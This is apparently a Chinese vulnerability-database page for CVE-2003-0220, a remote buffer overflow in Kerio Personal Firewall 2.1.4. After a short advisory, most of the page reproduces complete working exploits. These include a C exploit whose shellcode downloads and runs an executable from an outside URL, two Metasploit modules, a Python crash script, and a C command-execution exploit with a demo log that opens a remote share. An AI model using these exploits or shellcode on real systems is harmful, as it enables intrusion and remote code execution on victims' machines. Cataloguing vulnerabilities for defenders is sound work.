CVE-2003-0220
CVSS7.5
发布时间 :2003-05-12 00:00:00
修订时间 :2016-10-17 22:30:53
NMCOEPS    

[原文]Buffer overflow in the administrator authentication process for Kerio Personal Firewall (KPF) 2.1.4 and earlier allows remote attackers to execute arbitrary code via a handshake packet.


[CNNVD]Kerio Personal Firewall验证包远程缓冲区溢出漏洞(CNNVD-200305-031)

        
        Kerio Personal Firewall (KPF)是一款个人防火墙系统。
        Kerio个人防火墙管理验证处理过程存在问题,远程攻击者可以利用这个漏洞伪造恶意包触发缓冲区溢出,可能以管理员权限在系统上执行任意指令。
        当管理员连接防火墙时会进行握手连接,用于建立加密会话,握手的第4个包(第一个包是管理员发送)包含4字节数据,其中有一定固定值0x40 (64)指示后续的包含管理员密钥的包的大小。防火墙端在使用recv()处理这个数据的时候没有进行边界缓冲区检查,如果攻击者伪造包含超大数据的包发送给防火墙,此数据就会被读取到内存缓冲区时而发生缓冲区溢出,精心构建提交数据可能以系统管理员权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:kerio:personal_firewall_2:2.1.3
cpe:/a:kerio:personal_firewall_2:2.1.4
cpe:/a:kerio:personal_firewall_2:2.1.1
cpe:/a:kerio:personal_firewall_2:2.1.2
cpe:/a:kerio:personal_firewall_2:2.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0220
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0220
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-031
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105155734411836&w=2
(UNKNOWN)  BUGTRAQ  20030428 CORE-2003-0305-02: Vulnerabilities in Kerio Personal Firewall
http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
(VENDOR_ADVISORY)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
http://www.kb.cert.org/vuls/id/454716
(UNKNOWN)  CERT-VN  VU#454716
http://www.securityfocus.com/bid/7180
(UNKNOWN)  BID  7180

- 漏洞信息

Kerio Personal Firewall验证包远程缓冲区溢出漏洞
高危 边界条件错误
2003-05-12 00:00:00 2005-10-20 00:00:00
远程  
        
        Kerio Personal Firewall (KPF)是一款个人防火墙系统。
        Kerio个人防火墙管理验证处理过程存在问题,远程攻击者可以利用这个漏洞伪造恶意包触发缓冲区溢出,可能以管理员权限在系统上执行任意指令。
        当管理员连接防火墙时会进行握手连接,用于建立加密会话,握手的第4个包(第一个包是管理员发送)包含4字节数据,其中有一定固定值0x40 (64)指示后续的包含管理员密钥的包的大小。防火墙端在使用recv()处理这个数据的时候没有进行边界缓冲区检查,如果攻击者伪造包含超大数据的包发送给防火墙,此数据就会被读取到内存缓冲区时而发生缓冲区溢出,精心构建提交数据可能以系统管理员权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 关闭kerio个人防火墙远程管理员接口。
        Skin of Humanity security group提供如下第三方补丁:
        Source:
        
        http://www.s0h.cc/~threat/goodies/PFpatch/sources_PFpatch.zip

        Binary:
        
        http://www.s0h.cc/~threat/goodies/PFpatch/PFpatch.exe

        厂商补丁:
        Kerio
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.kerio.com/

- 漏洞信息 (28)

Kerio Personal Firewall 2.1.4 Remote Code Execution Exploit (EDBID:28)
windows remote
2003-05-08 Verified
0 Burebista
[点击下载] [点击下载]
/*
 * Kerio Personal Firewall v2.1.4 remote code execution exploit 
 * Tested on Windows XP with SP1
 * 
 * In order to exploit, for ease of mind, set the firewall to permit all traffic, or allow
 * a connection to port 44334 from your testing unix shell ip.
 * 
 * It is also possible to use UDP instead of TCP
 * 
 * It works out very well, if not, hit a few times with a ret addr of 0x41414141 to make it crash 
 * AT THAT addr. Then use the original one, it will work. The one I used points to a 'call esp'
 * inside the RPCRT4.DLL.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 44334 // the port client will be connecting to, default Kerio admin port 
#define retpos 5272	
#define MAXDATASIZE 5277 // max number of bytes we can get, also size of buffer

// global vars

struct sockaddr_in their_addr; // connector's address information 
char buf[MAXDATASIZE];
int numbytes;

unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xEB\x30\x5F\xFC\x8B\xF7\x80"
  
"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
  
"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
  
"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
  
"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
  
"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
  
"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
  
"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
  
"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
  
"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
  
"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
  
"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
  
"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
  
"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
  
"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
  
"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
  
"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
  
"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
  
"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
  
"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
  
"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
  
"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
  
"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
  
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
  
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
  
"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
  
"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
  
"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
  
"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64"
  
"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
  
"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
  
"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
  
"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
  
"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49"
  
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
  
"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
  
"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
  
"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
  "http://reversedhell.net/hackyou.exe"
  "\x08\x01"; // download + exec from the net ; donno who wrote this sc
  
  //change the url to whatever, this one pops up an innofensive message box

// end of global vars

int suck(int sock,int n) // painfull function to get rid of the painfull Kerio protocol
{
	int i=0,j=0,k,a=0,b=0,c=0,d=0;

	while (i<n)
	{

		if ((numbytes=recv(sock, buf, n, 0)) == -1) {
            	perror("recv");
            	exit(1);
	       }

        	if (j) i+=(numbytes-1); // ya i know i know :D
       
        	else i+=numbytes;

        	for (k=0;k<numbytes;k++) {
        					if (k % 10 == 0) fprintf(stderr,"\n");
        					if (buf[k]==0) fprintf(stderr,"    0 ");
        					else fprintf(stderr," %4.0d ",buf[k]);
        				     }	


        	fprintf(stderr,"    * ");
        	j++;
        	d=buf[numbytes];
        	c=buf[numbytes-1];
        	b=buf[numbytes-2];
        	a=buf[numbytes-3];
        	if ((i>200) && (a==0x1) && (b==0x0) && (c==0x1) && (d==0x0)) break;
        }
        fprintf(stderr,"\n");
        return i;
}


    int main(int argc, char *argv[])
    {
        int sockfd, i,j;  
        struct hostent *he;
 
        if (argc != 2) {
            fprintf(stderr,"usage: ./%s hostname\n",argv[0]);
            exit(1);
        }

        if ((he=gethostbyname(argv[1])) == NULL) {  // get the host info 
            perror("gethostbyname");
            exit(1);
        }

        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { // prepare a socket for connecting
            perror("socket");
            exit(1);
        }

        their_addr.sin_family = AF_INET;    // host byte order 
        their_addr.sin_port = htons(PORT);  // short, network byte order 
        their_addr.sin_addr = *((struct in_addr *)he->h_addr);
        memset(&(their_addr.sin_zero), '\0', 8);  // zero the rest of the struct 

        if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
            perror("connect");
            exit(1);
        }
 
        
        fprintf(stderr,"shell len = %d\n",strlen(shellcode));
	 fprintf(stderr,"Connected to firewall.\n");
	 memset(buf,0x0,sizeof(buf));
	 fprintf(stderr,"Sucking buffer..\n");
        suck(sockfd,266);
        fprintf(stderr,"\nBuffer sucked by black hole..\n");
    	 memset(buf,0x0,sizeof(buf));
    	 fprintf(stderr,"-------------------------------------------------\n");
    	 fprintf(stderr,"                 - BANNER -   \n");
    	 fprintf(stderr,"-------------------------------------------------\n");
    	 sleep(1);
	 fprintf(stderr,"coded by Burebista (aanton@reversedhell.net)\n");
	 fprintf(stderr,"           released on - 5 Apr 2003 -\n");
	 
	 sleep(2);
    	 fprintf(stderr,"-------------------------------------------------\n");
	 memset(buf,0x90,MAXDATASIZE); // set nops all over
	 
	 // prepares call up to beginning of buffer 32 bit=5 bytes
	 buf[MAXDATASIZE-1]='\xff'; //
	 buf[MAXDATASIZE-2]='\xff'; // call -1150
	 buf[MAXDATASIZE-3]='\xee'; //
	 buf[MAXDATASIZE-4]='\xab'; //
	 buf[MAXDATASIZE-5]='\xe8'; //
	  						
	 j=0;
                   // insert the shellcode in buf at 900
	 for (i=900;j<strlen(shellcode);i++) buf[i]=shellcode[j++]; 
	 
	 // prepares the new return address (on XPSP1 it is CALL ESP in RPCRT4.DLL)
	
	 buf[retpos-1]='\x78';
	 buf[retpos-2]='\x07';
	 buf[retpos-3]='\x06';
	 buf[retpos-4]='\x90';
	 
	 // this prepares packet header with negative length 
	 
	 buf[0]=0;
	 buf[1]=0;
	 buf[2]=0x14;
	 buf[3]=0xffffff9c; // negative, -100. firewall will prepare
	                          // buf of that size. signed integers hit again
	/*
         The 4th byte in the packet is the size of what the firewall will be expecting to receive
        right ahead. If we send longer buffer then what we told the firewall to expect, it will be
        simply truncated and nothing cool will happen. The problem is Kerio never thought we could
        tell it something that stupid like we are going to send -100 bytes, it is like expecting a
        client to buy -20 books from your library, which is an absurdity. There is no checking to
        make sure the user input is valid. Again, invalid trusted user input. What they should have
        done is either to use the 4th byte inside a modulus, to make sure it is always positive,
        either lamingly check if it is negative, and if true, stop processing the inputted data.
                 	
            What's so funny?                   
	*/
	 
	 if ((send(sockfd, buf,sizeof(buf),0)) == -1 ) { // PASARAN! 
		perror("send");
		exit(1);
	 }
	 fprintf(stderr,"..pasaran...\n");
	 fprintf(stderr,":D Done!\n");
	 
        close(sockfd);
       }


// milw0rm.com [2003-05-08]
		

- 漏洞信息 (1537)

Kerio Personal Firewall <= 2.1.4 Remote Authentication Packet Overflow (EDBID:1537)
windows remote
2006-02-28 Verified
44334 y0
[点击下载] [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::kerio_auth;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {

	'Name'  => 'Kerio Personal Firewall 2 (2.1.4) Remote Authentication Packet Buffer Overflow',
	'Version'  => '$Revision: 1.1 $',
	'Authors' => [ 'y0 [at] w00t-shell.net', ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp', ],
	'Priv'  => 0,
	'UserOpts'  => {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 44334],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },
	'AutoOpts' => { 'EXITFUNC' => 'process' },
	'Payload' => {
		'Space'     => 1000,
		'BadChars'  => "\x00",
		'Prepend'   => "\x81\xc4\x54\xf2\xff\xff",
		'Keys'      => ['-ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
	This module exploits a stack overflow in Kerio Personal Firewall 
administration authentication process. This module has only been tested 
against Kerio Personal Firewall 2 2.1.4.
}),

	'Refs'  =>  [
		['BID', '7180'],
		['CVE', '2003-0220'],
		['URL', 'http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10'],
	  ],

	'Targets' => [
		['Windows 2000 Pro SP4 English', 0x7c2ec68b],
		['Windows XP Pro SP0 English',   0x77e3171b],
		['Windows XP Pro SP1 English',   0x77dc5527],
	  ],

	'Keys' => ['firewall'],

	'DisclosureDate' => 'Apr 28 2003',

  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	if (! $self->InitNops(128)) {
		$self->PrintLine("[*] Failed to initialize the nop module.");
		return;
	}

	my $sploit =
	  Pex::Text::AlphaNumText(4268). $shellcode.
	  pack('V', $target->[1]). "\xe9\x0b\xfe\xff\xff";

	$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($sploit);
	$self->Handler($s);
	$s->Close();
	return;
}

1;

# milw0rm.com [2006-02-28]
		

- 漏洞信息 (16465)

Kerio Firewall 2.1.4 Authentication Packet Overflow (EDBID:16465)
windows remote
2010-06-15 Verified
0 metasploit
[点击下载] [点击下载]
##
# $Id: kerio_auth.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Kerio Firewall 2.1.4 Authentication Packet Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in Kerio Personal Firewall
				administration authentication process. This module has only been tested
				against Kerio Personal Firewall 2 (2.1.4).
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					['CVE', '2003-0220'],
					['OSVDB', '6294'],
					['BID', '7180'],
					['URL', 'http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e3171b } ],
					[ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77dc5527 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Apr 28 2003',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(44334)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit =  make_nops(4468) + payload.encoded
		sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV')

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
		

- 漏洞信息 (22417)

Kerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (1) (EDBID:22417)
windows dos
2003-04-28 Verified
0 Core Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/7180/info

A buffer-overflow vulnerability has been discovered in Kerio Personal Firewall. The problem occurs during the administration authentication process. An attacker could exploit this vulnerability by forging a malicious packet containing an excessive data size. The application then reads this data into a static memory buffer without first performing sufficient bounds checking. 

Successful exploits of this vulnerability may allow an attacker to execute arbitrary commands on a target system, with the privileges of the firewall. 

Note that this vulnerability affects Kerio Personal Firewall 2.1.4 and earlier.

import os
import socket
import struct
import string

def g():
     fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     try:
         fd.connect(('192.168.66.160', 44334))
         fd.recv(10)
         fd.recv(256)
         fd.send(struct.pack('!L', 0x149c))
         astr = 'A'*0x149c
         fd.send(astr)

     except Exception, e:
         print e
         pass

     fd.close()

g()
		

- 漏洞信息 (22418)

Kerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (2) (EDBID:22418)
windows remote
2003-04-30 Verified
0 ThreaT
N/A [点击下载]
source: http://www.securityfocus.com/bid/7180/info
 
A buffer-overflow vulnerability has been discovered in Kerio Personal Firewall. The problem occurs during the administration authentication process. An attacker could exploit this vulnerability by forging a malicious packet containing an excessive data size. The application then reads this data into a static memory buffer without first performing sufficient bounds checking.
 
Successful exploits of this vulnerability may allow an attacker to execute arbitrary commands on a target system, with the privileges of the firewall.
 
Note that this vulnerability affects Kerio Personal Firewall 2.1.4 and earlier.

/**************************************************************
 * Personal Firewall Engine remote buffer overflow Exploit
 **************************************************************
 *
 * Original information shared by CORE Security Technologies.
 * ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 * http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
 * ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 * Released : 30/04/2003
 *
 * Coded By ThreaT.
 * ThreaT@Ifrance.com
 * http://s0h.cc/~threat
 *
 ********************************************************************
 *
 * This exploit take advantage of the vulnerability discovered by
 * CORE Security Technologies for execute a command on remote workstations
 * equiped with the fallowing PSW :
 *
 * - Tiny Personal Firewall 2.0.15
 * - Kerio Personal Firewall 2.1.4
 *
 *********************************************************************
 *
 * Usage : PFExploit.exe <target> <victim_ip> <command to execute>
 *
 * =====================================================================
 * !! compile with : cl.exe /nologo PFExploit.c /link wsock32.lib !!
 * =====================================================================
 */


#include <windows.h>
#include <winsock.h>

#define len 0x1494

void main (int argc, char *argv[])
{
	SOCKET sock1;
	SOCKADDR_IN sin;
	int i;
	DWORD byte = htonl(len);

	char buffer[len], *p,

	shellcode[] = 

	"\xEB\x69\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1" 
	"\x8B\x70\x30\x80\x3E\x4B\x75\x4A\x8B\x40\x18\x8B\x58\x3C\x03\xD8" 
	"\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03\xF0\x56\x8B\x73\x24\x03\xF0" 
	"\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18\x4B\x8B\x34\x9A\x03\xF0\x03" 
	"\x74\x24\x10\x8B\x36\x39\x74\x24\x0C\x74\x08\x4B\x23\xDB\x75\xEA" 
	"\x58\x58\xC3\x5F\x33\xC9\x66\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04" 
	"\x07\xC3\x8B\x18\x39\x08\x8B\xC3\x75\xA6\xC3\xEB\x22\x6A\x01\x68" 
	"\x69\x6E\x45\x78\xE8\x89\xFF\xFF\xFF\x6A\x01\xFF\x74\x24\x0C\xFF" 
	"\xD0\x6A\x01\x68\x78\x69\x74\x50\xE8\x75\xFF\xFF\xFF\xFF\xD0\xE8"
	"\xD9\xFF\xFF\xFF";

	WSADATA wsadata;
	WORD wVersionRequested = MAKEWORD (2,0);

	struct _target {

		char Name[4];
		char *RetAddr;
		char *App;

	} targ[2] = {

		{"TPF" , "\xED\xEA\x2F\x01", "Tiny Personal Firewall 2.0.15"},
		{"KPF" , "\xF8\xEA\x61\x01", "Kerio Personal Firewall 2.1.4"},
	};
	

printf ("#############################################################\n"
	"Personal Firewall Engine, Remote buffer overflow Exploit !\n"
	"#############################################################\n"
	"Discovered by CORE Security Technologies & Coded by ThreaT\n-\n"
	"ThreaT@Ifrance.com\n"
	"http://s0h.cc/~threat\n-\n\n");
	
	if (argc < 4)
	{
		printf ("usage : PFExploit.exe <target> <victim_ip> <command to execute>\n\n"
			"TARGET ARE\n"
			"__________\n\n"
			"TPF : for Tiny Personal Firewall 2.0.15\n"
			"KPF : for Kerio Personal Firewall 2.1.4\n\n");

		ExitProcess (0);
	}

	if (!(p = (char *) LocalAlloc (LPTR,(strlen (shellcode)+strlen(argv[3])+3))))
	{
		printf ("error, cannot allocate memory\n");
		ExitProcess (0);
	}


	memset (buffer,0x90,len);

	strcpy (p,shellcode);
	lstrcat (p,argv[3]);
	memcpy (&buffer[200],p,strlen (p)+1);

	for (i=0; i < 2 ; i++)
		if (!lstrcmpi (argv[1],targ[i].Name)) break;

	if (i > 1)
	{
		printf ("Erreur : la cible %s est inconnue\n",argv[1]);
		ExitProcess (0);
	}


	if (WSAStartup(wVersionRequested, &wsadata)) 
	{
		printf ("Erreur d'initialisation Winsock\n");
		ExitProcess (0);
	}

	
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr=inet_addr (argv[2]);
	sin.sin_port = htons (44334);


	memcpy (&buffer[0x1490],targ[i].RetAddr,4);

	printf ("Cible : %s\n\n"
		    "Connecting to %s...", targ[i].App, argv[2]);
	
	sock1 = socket (AF_INET, SOCK_STREAM, 0);
	bind (sock1, (SOCKADDR *)&sin, sizeof (sin));
	if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) )
	{
		printf ("connexion failed !\n");
		ExitProcess (0);
	}

	printf ("ok!\n\n"
		    "sending crash for remote execution of '%s'...",argv[3]);
	
	Sleep (1000);
	send (sock1,(const char FAR *)(DWORD)&byte,sizeof (DWORD),0);
	send (sock1,buffer,len,0);

	puts ("ok");

}

/* DEMO ON MY LAN *

D:\code\exploits\kerio>ipconfig

Configuration IP de Windows 2000

Ethernet carte Connexion au r�seau local 2�:

        �tat du media . . . . . . . . . . : C�ble D�connect�

Ethernet carte Connexion au r�seau local�:

        Suffixe DNS sp�c. � la connexion. : ThreaT.lan
        Adresse IP. . . . . . . . . . . . : 10.0.0.1
        Masque de sous-r�seau . . . . . . : 255.0.0.0
        Passerelle par d�faut . . . . . . : 10.0.0.138

D:\code\exploits\kerio>net view \\10.0.0.3
La liste est vide.


D:\code\exploits\kerio>PFExploit TPF 10.0.0.3 "cmd /c net share c=c:\"
#############################################################
Personal Firewall Engine, Remote buffer overflow Exploit !
#############################################################
Discovered by CORE Security Technologies & Coded by ThreaT
-
ThreaT@Ifrance.com
http://s0h.cc/~threat
-

Cible : Tiny Personal Firewall 2.0.15

Connecting to 10.0.0.3...ok!

sending crash for remote execution of 'cmd /c net share c=c:"'...ok

D:\code\exploits\kerio>net view \\10.0.0.3
Ressources partag�es de \\10.0.0.3



Nom          Type         Local    Remarque

-------------------------------------------------------------------------------
c            Disque
La commande s'est termin�e correctement.


D:\code\exploits\kerio>

* EOF */		

- 漏洞信息 (F82995)

Kerio Firewall 2.1.4 Authentication Packet Overflow (PacketStormID:F82995)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2003-0220
[点击下载]

This Metasploit module exploits a stack overflow in Kerio Personal Firewall administration authentication process. This Metasploit module has only been tested against Kerio Personal Firewall 2 (2.1.4).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp


	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Kerio Firewall 2.1.4 Authentication Packet Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Kerio Personal Firewall 
				administration authentication process. This module has only been tested 
				against Kerio Personal Firewall 2 (2.1.4).

			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2003-0220'],
					['OSVDB', '6294'],
					['BID', '7180'],
					['URL', 'http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e3171b } ],
					[ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77dc5527 } ], 
				],

			'Privileged'     => true,

			'DisclosureDate' => 'April 28 2003',

			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(44334)
				], self.class)

	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit =  make_nops(4468) + payload.encoded
		sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV')

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
    

- 漏洞信息

6294
Kerio Personal Firewall Administrator Authentication Handshake Packet Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

